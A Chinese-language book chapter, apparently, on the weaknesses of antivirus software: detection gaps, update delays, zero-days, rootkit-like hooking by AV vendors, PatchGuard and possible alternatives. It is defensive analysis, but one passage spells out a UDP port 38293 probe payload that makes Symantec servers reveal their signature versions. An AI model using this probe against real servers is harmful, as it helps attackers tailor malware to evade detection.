我们已经通过现实世界的数据看到,防病毒技术精通特征码检测并且具有相当引人注目的用于所面临的恶意软件的启发式检测。但是,防病毒常常达不到预期效果,并且因为遗漏了一些非常醒目的恶意软件而臭名昭著。在本小节中,我们将基于实验数据对这些弱点进行评论。检测率为什么防病毒产品不能发现恶意软件?这种情况发生的频率如何?这取决于你所询问的人。最近AusCERT(澳大利亚计算机紧急响应组)声称所探测的80%的新恶意软件能逃过主要的防病毒产品的检测(http://www.zdnet.com.au/news/security/soa/Eighty-percent-of-new-mal-waredefeats-antivirus/0,130061744,139263949,00.htm)。但是,你在本章中看到的一些来自已知恶意软件的独立测试的数字表现了极高的检测率。这种差异可能指出了现实和实验中的悬殊差别。根据用于测试产品的恶意软件样本的广度和深度,测试结果也有很大的不同。因为病毒的种类有数十万种,样本中的细微差别可能无法发现。 防病毒产品在检测恶意软件中成败各半有一些符合逻辑的原因。我们已经介绍了许多种原因,例如当今病毒的复杂性和庞大的数量。检测可能归结为资源的问题——没有足够的工程师来及时制作和测试特征码。防病毒产品还必须保持低调并且不影响系统性能,这迫使软件工程决策可能对检测率产生负面影响。启发式引擎已经被证明会产生更高的假阳性率,这在公司环境中是无法接受的。因此,防病毒公司可能必须控制检测能力以改进假阳性率。 对新型威胁的响应 成功的防病毒产品最关键的措施之一可能是该公司对新兴的恶意软件的响应。万一发生像MyDoom这样的混合型蠕虫/病毒的全国性或者全球性的爆发,公司和家庭用户会依靠防病毒产品作为最后一道防线。但是,为了使这种防御有效,特征码的更新必须及时提供。研究表明,感染的时间已经缩短(机器更快地遭到侵害),恶意病毒的传播速度在过去5年也有了提高,使得响应时间成为了主要的关注点。实际上,MyDoom在不到4个小时就使互联网急剧变慢,导致全球互联网性能下降10%。 2008年底AV-Test.org进行的独立评估(http://www.virusbtn.com/news/2008/09_02)测试了主要的防病毒供应商对于年度主要的病毒爆发的响应时间。表7-7显示了结果。 数据清楚地显示,在33个产品中只有10个能够在4个小时内发布MyDoom的特征码(这些响应时间是来自于2008年的防病毒产品,而MyDoom发行于2005年!)。一些最流行的防病毒产品排在了列表的最后。 就这就有了客户接受度以及实现的问题:仅仅有可用的特征码并不意味着客户将他的防病毒产品配置为自动下载和安装更新。因此,采用最新的特征码只取决于客户,所以防病毒产品的成功(以及活跃病毒传播的阻止)始终由客户决定。对于企业环境和大的网络更是如此,在这种环境中防病毒更新必须首先下载到中心管理服务器,然后再由服务器将更新分发到连接该网络的各个主机。这些更新被设置为计划安装,可能每周或者每月一次。在这一时隙中,主机存在着漏洞。对于延迟更大的生产(活动)服务器来说情况就更糟,因为大部分公司要求在更新应用到活动服务器之前必须在脱机网络中进行手工测试,否则,更新中的不兼容或者缺陷可能导致活动服务器重新启动,这会影响业务操作。 防病毒公司发行更新的特征码以及终端主机安装更新之间的时延可能是特征码扫描概念的最大弱点,并且一直折磨着整个业界。并不是所有的集团公司网络都已经实施或者正确地遵循积极的防病毒更新策略。所以不难找到具有几个月到几年之前的过时特征码数据库的生产服务器。 记住,特定的供应商很快地发行更新并不意味着这些更新是高质量的。轻率的反应和完全没反应一样危险。而且,任何特定防病毒公司的响应时间取决于公司如何在得知病毒时对病毒威胁进行分类。如果供应商将某个病毒看做中等的威胁,它将较少注意这个病毒,从而减慢了响应时间。 记住,这些测试结果来源单一,而且结果每年都有很大的变化。例如,2005年AV-Test.org将Symantec的响应时间定为12个小时,但是表7-7中为4~6个小时,供应商的产品可能改进或者退步,业界也可能有整体上的变化。 最后,考虑供应商发行更新的频度也很重要。某个供应商可能对于引起媒体关注的大爆发反应很快,但是它是否能在整年中持续地提供高质量和定期的更新可能完全是两码事。你可以从http://www.av-test.org/index.php?menue=7&lang=0&sort=down&order=updates得到最新的排名,以及各供应商更新频度的比较。 零日攻击 零日(0-day)攻击是针对系统中未泄露的漏洞的攻击代码。我们已经讨论过,基于特征码的检测不能检测动态修改代码的恶意软件(例如变形和多态病毒),启发式检测也可能无法检测高级的恶意软件。零日级别的恶意软件代表着任何检测系统最棘手的目标。因为防病毒检测策略依赖于之前所了解的事实(不管是特征码还是启发式行为),这使得零日检测成为一个很大的问题。尽管某些零日攻击可能由于底层利用上的相似性而被防病毒引擎发现(例如,许多零日攻击试图打开一个远程外壳程序,允许远程控制台访问受害机器),但是大部分都能够绕过防病毒检测,这是因为防病毒引擎无法可靠地检测它所不了解的事物。 有两个网站能帮助跟踪防病毒产品对未知恶意软件的处理情况。你应该记住这些结果并未真正测试了所有零日恶意软件,而只包括所有防病毒产品都无法提出警告的恶意软件。这些网站从通过自动化互联网链接爬行或者用户人工提交(如virustotal.com)收集到的恶意软件数据库中得到数据。第一个网站是SRI International,根据发现新恶意软件二进制代码的能力对防病毒供应商进行排名(http://mtc.sri.com/live_data/av_rankings/)。在本书写作时得到的测试结果中,最高检测率为91%。这与在已知样本上基于特征码检测的99.6%检测率相比是急剧的下降。未知恶意软件的最差检测率为11%,这与基于特征码扫描结果中的低点55.3%相比是极大的下降。在Shadowserver基金会网站(http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.VirusWeeklyStats)上也能看到相似的数字,这个网站收集自己的恶意软件样本。表7-8显示了表7-5中列出的一些领先产品从已知病毒到未知病毒的检测中检测率的下降情况。 这个表格对于依赖防病毒技术来保护他们免遭数千种在互联网上游荡的未知恶意软件侵害的人来说是个坏消息。表7-8最说明问题的数据是基于特征码检测的领先者WebWasher-Gateway的检测率,从99.9%(接近完美)降到了14%(极其糟糕)。这一数字是防病毒产品启发式引擎质量的一个绝好的指标,并且进一步揭示了过于依赖特征码检测的产品。记住,基于特征码的扫描程序不能发现未编写特征的恶意软件。 防病毒软件中的漏洞 防病毒公司所面对的挑战中最为令人难堪和显眼的可能是被冠以多缺陷软件的恶名。你在新闻中总是能够听到关于Microsoft的漏洞的消息。而安全软件也很容易受到相同的编码恶习的影响(可以证明更是如此!)却往往没有引起注意。 在2005年的一篇有教益的文章《Insecurity in Security Software》(安全软件中的危险)中,AV-Test.org的Andreas Marx描述了流行的防病毒软件(如Computer Associates Vet、Alwil Avast!、Trend Micro和Symantec Anti-Virus)中的许多编程和逻辑缺陷(http://www.av-test.org/down/papers/2005-10_vb_2005.zip)。许多这种漏洞同样使攻击者能够执行任意的远程代码,安装Rootkit,窃取信息并且接管整个系统。 但是,有人可能会坚持,这些漏洞对所有软件来说都存在——的确如此。我们都知道软件是不安全的,因为很不幸人类(也就是软件开发人员)都不是完美的,无法写出无缺陷的代码。编写得很糟糕的代码对于计算机安全来说是最大的破坏因素。 当人们考虑到防病毒软件被列入《2007年SANS前20大安全风险》时(http://www.sans.org/top20/#s5),这种论点很快就变得无力。这种骇人听闻的事实可以用另一种方式解读:大部分家庭用户和公司以及联邦政府的网络作为最后防线的软件实际上是主机安全的最大危险。下面引用那篇报告中的一段: 在各大供应商包括Symantec、F-Secure、Trend Micro、McAfee、Computer Associates、ClamAV和Sophos所提供的防病毒软件中,已经发现了多个远程代码执行漏洞。这些漏洞可用于在有限或者完全没有用户交互的情况下完全控制用户的系统。 该报告还提到专门针对防病毒产品来避开检测的恶意软件正在急剧增加。让我们来看看这类恶意软件的一个实例——这是防病毒产品需要改进的又一个领域。 针对防病毒产品来避开检测的恶意软件 2007年发现了另一个令人尴尬的漏洞,涉及对Symantec Enterprise AV服务器的探查攻击。Symantec服务器暴露一个端口,用于管理员的各种维护工作。通过向Symantec Enterprise Server发送一个目标端口为UDP 38293、封包负荷为…….LDVPHiCM…….或者…….HiCMHiCM…….的特殊封包,Symantec服务器会使用本地计算机名、NAV服务器组、当前定义、时间戳、引擎版本、最后登记时间等信息来响应。掌握了这一信息,攻击者可以简单地创建一个该版本的特征码无法发现的恶意软件。 2007年使用这种技术在不进行任何恶意活动的情况下揭示了世界上数千台Symantec服务器的弱点。这只是对防病毒产品的探查攻击的一个例子。 用户交互需求 防病毒产品更基本的问题可能是在恶意软件检测过程的关键时刻依赖于用户交互。尽管在任何特定的防病毒软件中这不一定是个弱点,但是指出了检测过程本身固有的缺陷。 第一个领域是特征码更新。你的防病毒产品的能力实际上取决于用于特征码检测的特征码以及启发式逻辑的更新。正如“防病毒特性和技术”中所讨论过的,防病毒公司发行更新的频率各不相同;但是研究表明,用户由于各种原因而选择不更新产品。2006年Harris Interactive(由防病毒产品NOD32所在生产厂家ESET提供资金)的调查显示,65%的成人都推迟或者忽略病毒特征码(http://www.harrisinteractive.com/news/newsletters/clientnews/2006_ESET.pdf),原因从令人困惑的更新界面到完全不关心都有。而且,大部分防病毒公司以试用的形式提供产品,要求客户足够熟悉这些更新的价值、人工延期并且每年订购,这在无意中减弱了特征码更新的重要性。为了消除这种用户交互问题,有些防病毒公司默认开启自动定义更新甚至强制更新。当然,这在生产网络上无法接受,因为更新必须在应用到活动服务器之前进行人工测试。因此,大部分安装在连接到大型企业网络的防病毒产品都禁用自动更新功能,这样更新可以测试并从中央防病毒服务器推送。 检测过程中依赖用户交互的第二个领域是检测到一个警告时,一些产品允许用户选择对病毒的操作,其中之一是不做任何处理。没有疑心或者中立的用户将会采取最没有阻力的方法,选择不处理病毒。有些防病毒产品通过默认对某些警告实施强制性的操作来克服这一问题。但是这些操作(删除、隔离、修复等)常常没有清晰地定义或者得到理解,而且有时候失败的操作(例如防病毒产品无法删除威胁)进一步混淆了这个问题,使用户感到沮丧和不满意。 对于防病毒产品来说更根本的是用户培训。用户必须首先看到部署防病毒软件的价值,然后接受关于防病毒产品更新过程的特殊细节的培训。历史表明这是非常难以处理的问题。 缺乏系统完整性验证 你是否曾经为防病毒软件安装在一个被Rootkit感染的系统上时会发生什么而感到疑惑?防病毒程序应该如何反应?它会检测Rootkit还是假设系统处于纯净的状态?如果Rootkit主动地监控防病毒软件在系统上的安装,情况就会更糟。Rootkit可以向防病毒软件提供错误的信息,在用户完全不知情的情况下隐藏病毒和后门。 这个问题常常被当做“谁先到Ring 0”的问题而被遗漏——意思是,如果Rootkit和防病毒产品有相同的能力并且争夺OS中的相同权利(也就是在Ring 0中),谁获得控制权仅仅是谁先安装的问题。如果Rookit先安装,它就会控制系统,如果防病毒产品先安装,那么也能控制系统。但是,你可以在安装之前进行多种基本的系统完整性检查,如: ·验证系统服务表项目有没有被挂钩或者修补。 ·验证基本OS结构如IDT、GDT和LDT。 ·分析装入模块中有无可疑的驱动程序。 ·寻找不寻常的浏览器助手对象和协议处理程序。 检查这些区域,防病毒产品可以基本确定恶意软件还没有安装在系统上。目前为止,唯一公布的系统完整性验证程序是一个可选的、在操作系统自举前完成的一次性特征码扫描。这是个开始,还有许多要做的。 尽管这个问题常见于几乎所有安全软件,但是我们相信对于声称检测恶意程序的安全软件来说尤为关键。 7.5 防病毒曝光:你的防病毒产品是个Rootkit吗 这一节的标题并没有贬低的意思。提出这个问题是因为某些防病毒供应商确实使用了经过证明的Rootkit技术。这种争论已经起起落落多年了。 首先,在安全业界中众所周知,防病毒产品使用未支持和未写入文档的操作系统功能来达到检测目标。实际上,防病毒产品本身在许多方面上与Rootkit不相上下。我们将研究两个这样的场合,然后展示用于大部分最新的防病毒产品版本上的Rootkit技术的一些例子。 2006年初,防病毒巨人F-Secure发现了一些被认为与Sony Rootkit事件可以相比的事实(http://www.f-secure.com/weblog/archives/00000776.html和http://securityresponse.symantec.com/avcenter/security/Content/2006.01.10.html)。F-Secure的竞争对手Symantec在防病毒产品中添加了类似Rootkit的功能,防止家庭用户偶然地删除Symantec文件夹以及破坏扫描引擎。这种“功能”被称作“Norton Protected Recycle Bin(Norton受保护回收站)”,实际上对Windows API(从而对用户和大部分其他防病毒扫描引擎)隐藏了一个文件夹,如果用户不小心从Norton安装文件夹中删除一个重要的文件,它可以通过Norton SystemWorks恢复。除了使用常见于恶意软件和Rootkit的技术(隐藏文件夹和进程)以外,这个“功能”还给系统增加了新的安全漏洞——具体地说,任何知道这个隐含文件夹的病毒可以将自身复制到该位置而完全不可见!哇,看看你花钱换来了什么!幸运的是,Symantec很快更正了这个问题。 尽管这一事故确实是“好心办坏事”的例子,但是防病毒公司备受争议的做法并不止于此。一位被称作skywing的著名安全研究人员在2006年发表了一篇题为《What Were They Thinking?:Anti-Virus Gone Wrong》(他们在想什么?防病毒走错了路)的白皮书中,详细描述了最畅销的防病毒供应商Kaspersky和McAfee所采用的许多可疑的编程方法(http://www.uninformed.org/?v=4&a=4&t=sumry)。这些实践包括: 1)在安装期间修补系统服务。 2)不正常的用户模式指针验证。 3)对用户模式隐藏线程。 4)不正常的内核对象类型验证。 5)修补未输出的非系统服务内核函数。 6)允许用户模式代码访问内核模式。 防病毒产品仍然使用技术1和3(我们研究这两个部分是因为它们是skywing指出的问题中最具破坏性的)。上述这些做法不仅引入了可能使系统崩溃的严重漏洞,而且代表着防病毒公司在选择策略时确实是有疑问的。让我们来研究一下这些做法的原因。 注意:我们的测试使用VirtualBox在Windows XP SP2上进行。测试的产品尽管不能代表所有的防病毒产品,但是使用了防病毒业界中大部分产品使用的常规技术。 7.5.1 在运行时修补系统服务 在下载某个免费的防病毒产品的最新副本之后,我们开始测试防病毒软件是否仍然使用修补系统服务的手段。如果你对这种Rootkit技术不熟悉,可以返回到第4章,回顾一下SSDT钩子的概念。一言而蔽之,SSDT钩子(在运行时修补系统服务)是Rootkit用来将自身安装在操作系统和用户模式应用程序之间的一种技术,当应用程序从操作系统请求信息时(例如进程列表或者磁盘上的文件),Rootkit有机会修改信息。这种方法是最流行的文件和进程隐藏方法,早在1995年就为Rootkit所用。这种技术就是Symantec的SystemWorks用在Norton Protected Recycle Bin功能上的。 防病毒产品修补系统服务表的主要目的是将自身插入用户模式应用程序和操作系统之间作为一种屏障。通过修补服务表,企图执行各种功能(打开文件、启动进程、写入磁盘等)或者使用系统系统服务(安装驱动程序、读/写注册表键值、装入程序、连接到互联网等)的任何用户应用程序(包括病毒)将会首先通过防病毒产品。这样,防病毒扫描程序就有机会扫描企图请求服务或者执行操作的程序。 使用免费的Rootkit检测工具HELIOS(http://helios.miel-labs.com/),我们能够很快确定这种主流防病毒产品确实挂钩11个系统服务表函数。图7-1显示了结果的屏幕截图。 HELIOS使用一个驱动程序来监视SSDT的修改。只要安装这个防病毒产品,就立即会报告修改。所有挂钩的系统服务调用从Windows内核(ntoskrnl.exe)被重定向到防病毒产品的驱动程序(这里我们不指出名称,以保护犯罪)。这样,所有企图使用那些服务的程序(包括病毒)将首先受到防病毒产品的检查。 图 7-1 流行的防病毒产品使用Rootkit的SSDT钩子技术 防病毒产品和Rootkit一样使用这种做法是个坏主意吗?Microsoft是这么认为的: 通过未写入文档的方法(例如挂钩系统服务表)扩展或者替换内核服务的内核模式驱动程序,这可能干扰其他软件并且影响操作系统的稳定性……Microsoft不鼓励这种做法……如果操作系统发现这种修改或者其他未经授权的补丁,将生成一个缺陷检查并且关闭系统(http://www.microsoft.com/whdc/driver/kernel/64bitPatching.mspx)。 2002年,Microsoft启动了一个名为“可信计算倡议”的活动,以压制越来越多的媒体有关他们的操作系统安全的报告。在几年以后的Windows 2003 Service Pack 1和Windows Vista中,Microsoft包含了针对SSDT钩子等做法的保护。但是请等一下,这样会破坏防病毒软件吗?当然。我们将在7.6节中看到这种令人好奇的争斗。 7.5.2 对用户模式隐藏线程 在受测的防病毒产品的安装期间,发生了一件奇妙的事情。HELIOS发出一个警告,Windows API函数ZwQuerySystemInformation()报告一个进程没有正常结束。在安装过程完成后,这个异常消失了。然后,在扫描的初始化中,又报告了这个异常,之后异常再度消失。报告的进程是防病毒程序的用户模式主进程。注意,skywing的文章曾讨论了Kaspersky使用NtQuerySystemInformation()来对用户和Windows隐藏线程(http://www.uninformed.org/?v=4&a=4&t=sumry)。ZwQuerySystemInformation()是调用NtQuerySystemInformation()的一个存根程序。但是HELIOS的输出显示NtQuerySystemInformation()没有钩子——它指向Windows内核(见图7-2)。这是件糟糕的事情。 图 7-2 ZwQuerySystemInformation()所发生的事情 进一步使用Volatility(用于从内存转储中提取系统信息的开放源码脚本库)和Windbg(Microsoft的调试工具软件提供的用于调试防病毒引擎驱动程序的内核模式调试器)显示多个线程在用户模式查询中丢失了。 7.5.3 是一个缺陷吗 为了阐述防病毒技术的复杂和不安全,我们希望分享一些在这次测试中发现的有趣表现。当试图使用一个开源内存获取工具转储物理内存(用于隐藏线程分析)时,防病毒产品警告我们该程序是一个病毒。这在预期之中,因为该工具使用段对象\\Device\PhysicalMemory来复制系统RAM的内容到一个文件。这个对象历史上被Rootkit和恶意软件所滥用。但是这不是我们所指的有趣表现。 有趣的是,防病毒扫描程序继续阻止内存获取工具(它只是暂停,就像挂起状态一样),直到我们打开配置界面并且试图修改扫描程序策略使用文件/文件夹排除列表。这种排除列表功能是防病毒产品用来让用户排除所扫描的文件和文件夹的。我们不希望防病毒产品阻止我们使用自己的工具,所以希望将工具的文件名称添加到该产品的排除列表中。在研究这个排除列表界面时,我们碰巧单击了显示另一个窗口以定义文件扩展名排除列表的按钮。这个功能允许用户定义基于文件扩展名的总体排除规则。例如,如果我们不希望防病毒产品扫描MP3文件,可以定义一个扩展名排除规则以阻止防病毒引擎扫描所有系统上的MP3文件。 我们在扩展名列表中修改任何扩展名或者单击OK按钮之前,内存获取工具开始转储物理RAM,表明防病毒扫描程序释放了对工具的控制。因此,在表面上,似乎在我们决定自己希望允许/不允许哪个扩展名之前,防病毒扫描程序就采取了措施。因为预先装入的扩展名列表包含所有已知的扩展名,这意味着机器上的任何具有这些扩展名之一的病毒都被自动添加到扩展名列表并且允许执行。 如果我们在扩展名列表配置窗口中单击Cancel(取消)(没有修改任何项目或者单击OK按钮),获取工具再次被阻止;即使回到防病毒扫描程序配置主面板,使用扩展名列表的无线按钮仍然被选中;我们不能确定防病毒扫描程序这时候使用哪个扩展名列表;扫描程序的表现现在无法预测。实际上,回到获取工具的命令行窗口之后,系统立刻进入蓝屏状态。 这里的潜在危险是任何了解这个“怪癖”的恶意软件能够轻易地定位在磁盘上或者内存中的配置并且启用默认扩展列表,使防病毒扫描程序无效。现在,这个缺陷和相关的蓝屏很容易与虚拟机、HELIOS、内存获取工具中的某些冲突或者缺陷,以及其他可能的难题联系在一起。但是这种情况仍然是防病毒产品由于复杂度和使用未写入文档的修改来保护操作系统所导致的潜在问题的一个有力的例子。 记住,我们只是偶然地在使用工具中碰到这个缺陷。想象一下,专注的对手可能花一点时间和资源就能做到这一点。这很自然地让我们想到…… 7.6 防病毒业界的未来 我们已经研究了防病毒业界的长处、弱点和完全应该被指责的行为,接下来要转向讨论防病毒公司所要面对的未来。在这个讨论中,我们将研究一些过去对防病毒业界终结的预测并且根据自己的预测提供一些线索。 7.6.1 为生存而战斗 对防病毒业界的生存最大的威胁可能发生在2005年和2006年,当时Microsoft宣布了被称作内核修补保护(kernel patch protection,KPP)的新技术,这种技术更常被称作PatchGuard。这种技术集成到Windows内核,使其可以保护自身免遭未经授权的修补和修改。这种修改包括SSDT修改和嵌入函数钩子。这实际上意味着没有应用程序包括内核驱动程序能够修改Windows内核。在此之前,Rootkit和防病毒供应商都依赖于可修补的内核实施自己的技术。这看上去像是一个合理的思路,也是Microsoft改善传统上不安全的操作系统的一个正确步骤。 但是,这个决策并没有得到媒体特别是防病毒业界的广泛接受。实际上,结果是一整年的官司,以及没完没了的来自防病毒业界的牢骚和抱怨。McAfee和Symantec首当其冲,威胁在欧洲提起反托拉斯诉讼。它们最终赢得了这场旷日持久有时又非常激烈的争斗(包括一个防病毒供应商在产品中集成了一个PatchGuard利用程序,以应付最后的期限,参见http://www.pcauthority.com.au/News/67402,security-vendorcircumvents-windows-vistas-patchguard.aspx)。Microsoft发动的是一场正义之战,但是最后被迫发布一个API函数套件,用于“安全合作伙伴”修改Vista的内核。这些API允许授权供应商避开PatchGuard(包含在所有Windows64位操作系统中),包含在2007年1月发行的Vista SP1中。 注意:Microsoft对防病毒供应商是同情的,承诺不在32位系统上强迫使用PatchGuard:“对于基于x86的系统,Microsoft不鼓励这些做法,但是不使用程序阻止它们,因为这么做将会破坏许多已发行的软件的兼容性。基于x64的系统没有相似的已发行软件库,所以可以添加这种内核保护而不影响兼容性。”参见http://www.microsoft.com/whdc/driver/kernel/64bitPatching.mspx. Microsoft能够对许多发现了影响主流操作系统开发的机会的软件供应商强加某些限制。在一篇短小的技术文档(http://www.microsoft.com/downloads/details.aspx?FamilyId=4C7561E6-6F9D-4125-8A8C-AEAF8E3342B9&displaylang=en)中,Microsoft对使用这种变通API的供应商的请求和技术需求提出了基本的规则。Microsoft巧妙地提到了在使用这些API的程序中不允许类似Rootkit的行为: 使用这些API的程序必须能够让管理员检测到。必须支持一个标准的管理性卸载程序,代码在模块枚举操作中必须可见。不造成进程或者资源完全不可见于管理员的情况。例如,所有进程应该可以在任务管理器中看到。 听起来是不是很熟悉? 7.6.2 是行业的毁灭吗 过去曾经有许多对防病毒行业灭亡的预测。这虽然不是一个新的话题,但是重新考虑防病毒产品是否提供防御策略中的一个有用层次是很重要的。 正如2002年Paul Schmehl在SecurityFocus.com上提出的(http://www.securityfocus.com/infocus/1562),广泛为人们所接受的事实是,防病毒技术虽仍存在,但已经无用。Schmehl提出一个论点,防病毒供应商在向客户分发特征码更新时必须牺牲质量或者速度,而且恶意病毒的某些应变使特征码的创建过程需要花费许多人力和工程技巧来分析高级的多态加密恶意软件,从而成为一场失败的战役。很简单,这么做是根据简单的数学知识进行的无用之举(作者用“无意义的竞争”来代替“军备竞赛”)。 Schmehl预言“行为阻止(behavioral blocking)”技术最终将取代防病毒。这些技术能自动地在沙箱环境中分析病毒行为。自从虚拟化兴起之后,多个这类产品已经发展起来(例如Truman沙箱);但是防病毒公司也同样使用这种技术。 7年后我们发现自己处于相同的位置:防病毒公司仍然很兴旺,尽管它们还在进行着失败的战役。为什么防病毒技术仍然存活?可能的解释可以在病毒本身的革新中找到。 Steven Furnell和Jeremy Ward博士在2005年提出(http://www.securityfocus.com/infocus/1838),计算机病毒已经完成了从简单感染到稳定/持续感染,并且最终成功地提取主机信息的变革。根据作者的说法,这一变革和生物学上的病毒相同。这种类比得到了当时所发现的与病毒相伴的后门的剧增这一事实的支持。由此,病毒到达了一个稳定的立足点,可以稳定地存续并且在不被发现的情况下窃取信息。病毒技术已经变得很先进并且多样化,使得防病毒公司不再能跟上或者构成一个重要的威胁。不断增长的网络犯罪和国家提供资金开发病毒,形成了一个非常赚钱的数字犯罪行业。根据IBM的《X-Force 2008趋势与风险报告》(http://www-935.ibm.com/services/us/iss/xforce/trendreports/xforce-2008-annualreport.pdf),2008年发现的恶意病毒中,30%属于信息窃取类型(以窃取密码和信用卡信息或者进行其他方式的欺诈,如身份窃取为唯一目的的恶意软件)。 病毒已经达到了一个动态平衡并且在一个获利的犯罪行业中发展。那么防病毒行业呢? 前面已经提到过,防病毒在2008年是一个价值100亿美元的产业。看上去这也是很赚钱的。实际上,两个行业并没有将对方挤垮,相反,这两个产业似乎已经形成了一种密不可分、共同进化的互利关系,这并非它们的错。只有摧毁其中一个产业,才能使另一个产业消亡。两个行业都经受了时间的考验,我们发现无法做出比以前更接近的预测。 问题的根源很深,最终埋藏在计算机科学、软件工程以及有限状态机的基本原则之中。本质上,防病毒技术之所以在2009年仍然有意义,是因为在开发级别上保证软件安全的潜在问题仍然没有解决。只要安全仍然是个拼凑性的工作,恶意软件就有办法进入,防病毒也就能够继续它们的工作,提供一些针对小儿科的安全考虑的保护。 7.6.3 可能替换防病毒的技术 好了,我们刚刚对防病毒公司的光明未来恢复了信心。现在我们收回那段陈述,列出这些公司必须接受新观念的原因。在过去的几年中,一些技术已经成熟,提供了防病毒的真正替代品,而这在前些年是不可能的。这些技术并不是全新的;只是需要花费时间来使它们在价格和基础结构上成为可行。这些技术包括: ·虚拟化 这已经强力带动了IT产业,结果是,我们已经看到了主机时代以来所不曾实现的稳固和集中的IT基础结构。蜜罐、恶意病毒分析场以及许多虚拟技术的创造性使用已经流行起来并且持续地成为弥补防病毒软件不足的方法。 ·瘦客户机 业界相当热心于使用轻量级的具备很小或者根本没有存储的瘦客户机来替代臃肿的具有本地存储(RAM和硬盘空间)的PC终端。这种客户机通过将用户的数据放在一个每天清除的中央虚拟存储中,消除了企业中的各个主机上过多的成为恶意病毒嵌入空间的存储。这样,恶意病毒的生命期从数年被减少为几天。 ·“云防毒” 防病毒公司本身正在开始了解目前的局势;新兴的趋势是将主机安全与恶意软件保护分开,将检测移到“云”(cloud)中。这不是一个新概念,是由Google Docs之类的“软件即服务”(SAAS)技术推向流行的。通过集中扫描单个存储用户数据的储存库,病毒的攻击面急剧减少。因为恶意软件扫描和保护不再在主机上实施,云防毒还允许一次运行多个扫描程序,并行运行更多复杂的启发式引擎,以及不计其数地投入“主扫描程序”的资源。这种技术将同时改进记录的保存、追溯式扫描和事故响应数据,并且简化软件的管理。这个领域中已经完成了一些有趣的研究(http://adl.csie.ncu.edu.tw/uploads/CloudAV.ppt)。像Trend Micro这样的公司已经接受了企业防病毒的新边界。 ·免费防病毒扫描程序 从Trend Micro的House Call开始,在过去几年已经出现了许多新的免费防病毒扫描程序(许多是在线的)。有些扫描程序的性能已经名列前茅,例如Avast!和Antivir。 ·先进的加密白名单(whitelisting) 防病毒技术基于被称为黑名单(blacklisting)的技术——使用特征码或者启发式的方法阻止你所知道的坏程序。黑名单的问题是任何你所遗漏的程序都被允许执行的。另一方面,白名单采用相反的方法,只允许已知的好程序运行。那样,最糟糕的情况是你阻止了实际上合法的未知程序(有些人认为这也比它的替代方法好)。一种新兴的技术使用一种先进的白名单形式,已经走到了防病毒竞争的前列。传统的白名单包括创建一个你希望允许在系统上运行的应用程序列表,然后禁止其他程序。技巧在于使用何种机制允许或者拒绝应用程序。市场上的大部分白名单解决方案使用集中的MD5 hash知识库,这就和防病毒软件一样有特征码维护的问题。Savant Technologies公司创立了一种专利技术,为“已知的好”应用程序创建在整个系统中独一无二的加密键值。这样,在一个计算机上的二进制代码将具备与在另一台PC相同的二进制代码不同的键值,这就避免了恶意软件试图重用一个偷来的键值进行关键字攻击。如果一台PC由于人为错误而被感染,这次感染不会传播到其他任何一台机器上,因为病毒没有其他机器上的键值。为了把病毒传播到其他机器,必须单独重新感染每台机器。这种技术的力量在于它假定在某个时间点至少有一个系统会受到感染,因为人是容易犯错的。通过加密设计,这种技术避免了感染的进一步传播。 关于“替代技术”的最后想法:计算机安全社区中的一些研究人员和学者强调针对膨胀的恶意软件问题采用“回到根源”的方法。这种方法有许多变种,主要包括解决一些软件开发问题。培训软件开发人员使用安全编码方法,以及投资隔离第三方代码的新技术避免可公开利用的漏洞都成为流行。Microsoft的Singularity项目是一个例子——一个完全运行托管代码的操作系统,这意味着操作系统运行于一个沙箱之中。 7.7 小结和对策 我们在本章中已经相当深入地讨论了与防病毒技术相关的各种问题,读者现在应该已经了解了业界的最新状况。对防病毒的弱点和长处也进行了介绍;揭示了一些隐蔽的框架;推测了业界未来的可能结果。读者从本章的学习中应该领会到什么呢? 简单地说,现在,保留你的防病毒产品,等待着结果。对于普通的家庭用户,在当今这个快速发展的基于互联网的世界里,防病毒是必须的。因为防病毒公司、产品、集成服务的数量,防病毒已经成为对抗恶意感染必要的最后防线。对于家庭用户,解决方案相对简单:安装并且配置自动定义更新。必要的更新不需要任何用户交互就能下载和安装,大大改进你的安全态势,同时又让你省心。 至于企业网络,我们强烈建议由一位专门的安全管理员负责不断维护、更新和管理企业防病毒解决方案。大部分防病毒供应商都已经将多个产品集成到一个信息安全套件中,允许从单个应用程序中完成防病毒、桌面防火墙、主机入侵检测甚至网络访问控制。但是,每个企业必须确保100%的用户更新,以维护100%有效的防病毒解决方案。 很可能,防病毒行业不会做出重大的方向修正,因为生意还很好。只要用户知道防病毒产品在做什么并且理解其局限性,那么也没有什么问题。真正的危险是用户以为防病毒产品将100%地能够保护他们免遭病毒和恶意软件的侵害。 用户应该自己学习防病毒产品所提供的功能以及可能的替代产品。考虑开放源码的防病毒措施如OpenAntiVirus.org(http://www.openantivirus.org/)以及前面所介绍的更新的技术。 强烈建议掌握一些常识,使用一些非常基本的最佳做法能够避免大部分的恶意软件的打扰: ·不要在每天使用的计算机上以管理员登录。 ·使用内建的Microsoft技术,如数据执行保护(DEP)。 ·设置ActiveX killbit并使用IE7保护模式。 ·将边界防御作为分层安全策略的一部分。 用户应该预先计划并且知道在系统被感染时的恢复方法。这种主动的安全方法包括: ·在你第一次使用新计算机时使用Windows还原点和Vista的PC备份功能。 ·使用Norton Ghost或者相似的应用程序创建整个系统的备份。 ·利用“影子分区”维护操作系统的冗余可恢复副本。 ·将关键数据备份到只读媒体。 “重映像”系统的概念是发现病毒感染时常用的一种响应措施。重映像一个系统通常包括通过仅包含基本软件和系统文件的基线备份映像覆盖硬盘,将系统恢复到“已知的良好状态”。这种措施实际上将系统恢复到含有最少软件的已知良好状态。注意不要依赖简单的重映像作为对病毒感染的防御,因为备份的副本也可能被感染。而且,攻击方向仍然存在于你刚刚恢复的系统上,随时可能被攻击者再次利用。 第8章 主机保护系统 你的企业主机是企业的第一道和最后一道防线。不管是工作站、服务器还是网络设备,所有这些主机都成为攻击者的目标,用于向你的操作系统注入任意数量的恶意软件。你所重视的是防范这些主机,在任何时候任何地点避免多种类型的恶意软件爆发。目前为止,我们已经介绍了恶意软件技术、各种功能,甚至提供了一些恶意病毒和Rootkit的有效实例——所有这些都针对你的主机。我们已经讨论了防病毒程序及其功能和局限性。现在我们来看看其他一些基于主机的安全产品,这些产品设计用于保护你的系统。 8.1 个人防火墙功能 